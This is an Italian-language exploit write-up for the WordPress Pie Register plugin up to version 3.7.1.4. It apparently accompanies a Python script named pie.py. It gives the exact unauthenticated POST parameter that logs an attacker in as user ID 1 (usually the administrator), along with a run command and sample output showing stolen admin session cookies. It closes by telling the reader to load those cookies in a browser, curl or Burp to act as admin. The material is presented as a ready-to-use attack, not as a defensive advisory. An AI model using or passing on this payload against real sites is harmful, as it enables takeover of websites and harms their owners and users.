
WordPress Pie Register ≤ 3.7.1.4 - Escalation dei privilegi di amministratore (Non autenticato)
Mrj Haxcore
Il plugin Pie Register per WordPress (versione ≤ 3.7.1.4) espone un endpoint non autenticato che consente a un attaccante di dirottare le sessioni di amministratore semplicemente inviando un payload specifico via POST.
Lo sfruttamento consente di rubare i cookie di sessione dell'utente ID 1 (di solito admin) senza bisogno di alcuna credenziale di accesso.
pie-registeruser_id_social_site=1
Quando viene inviato all'URL radice (/), questo parametro fa sì che il plugin autentichi l'attaccante come l'utente con ID 1 (tipicamente admin) e generi cookie di sessione validi.
requests, beautifulsoup4 (opzionali, per il parsing dei cookie)python3 pie.py http://target.site
---
Output
[*] Sending payload to hijack admin session...
[+] Successfully hijacked cookies for user_id=1 (admin):
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] Use these cookies in your browser or tools like curl or Burp to act as admin.